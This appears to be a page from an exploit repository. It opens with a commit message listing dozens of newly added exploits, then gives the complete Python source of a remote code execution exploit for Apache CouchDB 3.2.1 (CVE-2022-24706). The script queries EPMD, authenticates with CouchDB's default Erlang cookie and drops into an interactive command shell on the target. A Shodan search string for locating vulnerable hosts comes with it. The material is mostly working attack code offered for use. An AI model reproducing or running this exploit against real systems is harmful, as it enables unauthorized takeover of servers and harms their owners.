be24992411
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
136 lines
No EOL
4.2 KiB
Python
Executable file
136 lines
No EOL
4.2 KiB
Python
Executable file
# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
|
|
# Date: 2022-01-21
|
|
# Exploit Author: Konstantin Burov, @_sadshade
|
|
# Software Link: https://couchdb.apache.org/
|
|
# Version: 3.2.1 and below
|
|
# Tested on: Kali 2021.2
|
|
# Based on 1F98D's Erlang Cookie - Remote Code Execution
|
|
# Shodan: port:4369 "name couchdb at"
|
|
# CVE: CVE-2022-24706
|
|
# References:
|
|
# https://habr.com/ru/post/661195/
|
|
# https://www.exploit-db.com/exploits/49418
|
|
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
|
|
# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
|
|
#
|
|
#
|
|
#!/usr/local/bin/python3
|
|
|
|
import socket
|
|
from hashlib import md5
|
|
import struct
|
|
import sys
|
|
import re
|
|
import time
|
|
|
|
TARGET = ""
|
|
EPMD_PORT = 4369 # Default Erlang distributed port
|
|
COOKIE = "monster" # Default Erlang cookie for CouchDB
|
|
ERLNAG_PORT = 0
|
|
EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
|
|
|
|
# Some data:
|
|
NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
|
|
CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
|
|
CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
|
|
CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
|
|
|
|
|
|
def compile_cmd(CMD):
|
|
MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
|
|
MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
|
|
MSG += struct.pack(">H", len(CMD))
|
|
MSG += bytes(CMD, 'ascii')
|
|
MSG += b'jw\x04user'
|
|
PAYLOAD = b'\x70' + CTRL_DATA + MSG
|
|
PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
|
|
return PAYLOAD
|
|
|
|
print("Remote Command Execution via Erlang Distribution Protocol.\n")
|
|
|
|
while not TARGET:
|
|
TARGET = input("Enter target host:\n> ")
|
|
|
|
# Connect to EPMD:
|
|
try:
|
|
epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
epm_socket.connect((TARGET, EPMD_PORT))
|
|
except socket.error as msg:
|
|
print("Couldnt connect to EPMD: %s\n terminating program" % msg)
|
|
sys.exit(1)
|
|
|
|
epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
|
|
if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
|
|
data = epm_socket.recv(1024)
|
|
data = data[0:len(data) - 1].decode('ascii')
|
|
data = data.split("\n")
|
|
if len(data) == 1:
|
|
choise = 1
|
|
print("Found " + data[0])
|
|
else:
|
|
print("\nMore than one node found, choose which one to use:")
|
|
line_number = 0
|
|
for line in data:
|
|
line_number += 1
|
|
print(" %d) %s" %(line_number, line))
|
|
choise = int(input("\n> "))
|
|
|
|
ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
|
|
else:
|
|
print("Node list request error, exiting")
|
|
sys.exit(1)
|
|
epm_socket.close()
|
|
|
|
# Connect to Erlang port:
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((TARGET, ERLNAG_PORT))
|
|
except socket.error as msg:
|
|
print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
|
|
sys.exit(1)
|
|
|
|
s.send(NAME_MSG)
|
|
s.recv(5) # Receive "ok" message
|
|
challenge = s.recv(1024) # Receive "challenge" message
|
|
challenge = struct.unpack(">I", challenge[9:13])[0]
|
|
|
|
#print("Extracted challenge: {}".format(challenge))
|
|
|
|
# Add Challenge Digest
|
|
CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
|
|
+ bytes(str(challenge), "ascii")).digest()
|
|
s.send(CHALLENGE_REPLY)
|
|
CHALLENGE_RESPONSE = s.recv(1024)
|
|
|
|
if len(CHALLENGE_RESPONSE) == 0:
|
|
print("Authentication failed, exiting")
|
|
sys.exit(1)
|
|
|
|
print("Authentication successful")
|
|
print("Enter command:\n")
|
|
|
|
data_size = 0
|
|
while True:
|
|
if data_size <= 0:
|
|
CMD = input("> ")
|
|
if not CMD:
|
|
continue
|
|
elif CMD == "exit":
|
|
sys.exit(0)
|
|
s.send(compile_cmd(CMD))
|
|
data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
|
|
s.recv(45) # Control message
|
|
data_size -= 45 # Data size without control message
|
|
time.sleep(0.1)
|
|
elif data_size < 1024:
|
|
data = s.recv(data_size)
|
|
#print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
|
|
time.sleep(0.1)
|
|
print(data.decode())
|
|
data_size = 0
|
|
else:
|
|
data = s.recv(1024)
|
|
#print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
|
|
time.sleep(0.1)
|
|
print(data.decode(),end = '')
|
|
data_size -= 1024 |